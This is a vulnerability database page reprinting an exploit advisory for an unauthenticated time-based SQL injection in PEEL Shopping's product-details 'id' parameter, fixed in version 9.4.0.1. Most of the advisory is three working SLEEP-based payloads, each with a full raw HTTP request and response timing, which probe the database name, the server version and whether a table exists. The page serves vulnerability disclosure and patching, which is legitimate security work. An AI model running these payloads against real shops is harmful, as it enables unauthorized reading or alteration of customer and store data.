Vulners
Lucene search
PEEL Shopping 9.3.0 SQL Injection
`# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3
################
# Description #
################
# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
#####################
# PoC of detection #
#####################
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
PoC #1) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
Request: The response duration = 418 bytes | 7,719 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
PoC #2) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
Request: The response duration = 418 bytes | 5,112 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
PoC #3) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
Request: The response duration = 418 bytes | 10,140 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3.
# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2021 00:00Current
0.2Low risk
Vulners AI Score0.2